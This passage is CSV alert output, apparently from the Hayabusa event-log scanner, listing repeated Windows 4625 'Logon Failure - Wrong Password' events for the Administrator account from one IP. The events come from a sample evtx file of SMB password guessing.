+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tITW0ihpErFk3nKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MdQqr1T4frPNlulf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: niiXRpP5AVHpG9Hu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EThR98jZUdwNxbXQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBsJcIw859FfEkLD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kG4Tv5vauSWhbj8F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 453tjgRGMu46vC33 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fnzhhfszxJWxLCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWPkeL8TnAbC1nSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JrDmUzyK4Xxx6Jn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMTf9D2yjumfS9LM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cCs65ithseTCORa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBrGAScjpAdScGmJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n90F99qBpmUUVLId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLeOkIG0hVHIOnN7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVx5uUtkaFIf7PWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kgd7lCQUQ3dHN18S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8m2MmpFVK9Uojp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0NZjeu3lb5xddVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YjjXBZnyWt0ljzpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sinFBozyUR0sBadM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Au22Y0LIuvTmZDpy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QDWW3VfZ7rKayV2v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPgaFDZtc5wEupnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpYZc2TTDfJFnPHo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rYKkl1iHImW9NwKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KxA2dh1iUMaMWOkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sCzEzW8jDZGGZcpd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p8510u5OsCVd94I5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2a0whHngnv7o1Bz2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xy6cGuYgubjlXoMw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luoXLN2XZQC0lHfu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8jdKLW96haKCHHXI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9SQSH6E1aKXu1o7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nOUdKa838wK1mLFw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aFmILxspIJsiEHwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCz7qbdSEyqxQSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny3F1xPgakJK0CA7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi7Moaa6d12CzWhl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fbbRVOig9bn9p5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qSZrfRe9d0LLkbmA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QqdZMYsbXFlrKFxk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kypdxj88trEUBEny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9hM8fge1IrNsJNd2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SzG27JSj6iAFyiNT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hWcjuW8dU5ATLHzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ns9lm9Nvhvi4fY6A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aExdYPqY2eUCYZmC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t9cnmRGdByuJlKZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f9RvWTFFUgCrhlkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HC3oQUIEWqztyx6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TK3BOeD2w9xPB4N1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6yzU5WuvpmPKLSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GFoUGsara5Pl03WP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLaOCImeMIMlGvMj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Vzb3pEI2ZeP2NFA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Fa7ebH7UXd1KW4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wRBHXRkOa6x5KI5G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VNVxzgOLrZzfP3cB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCNXajRX2lIgLQuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x0nukf24IoalycOn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZFZN0KfeHtyDppG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmxqKyWU5GU1y22P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuRyvCfgQ4rwG3fu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3prKZt5ymouwNKnK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CWrNNn13EC1FLwLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfnBT5OvT5cQXHfS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLZFPCShXoPvvThS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UsPCJ0UlfH4urYrm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIQlOetFByLZqPkT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9IBZ0qTDlHWADZt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lmhkB39gKvvuT89e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4KPoZ8JB7WSjUCHW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0mwiPq4gF1YXkQSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
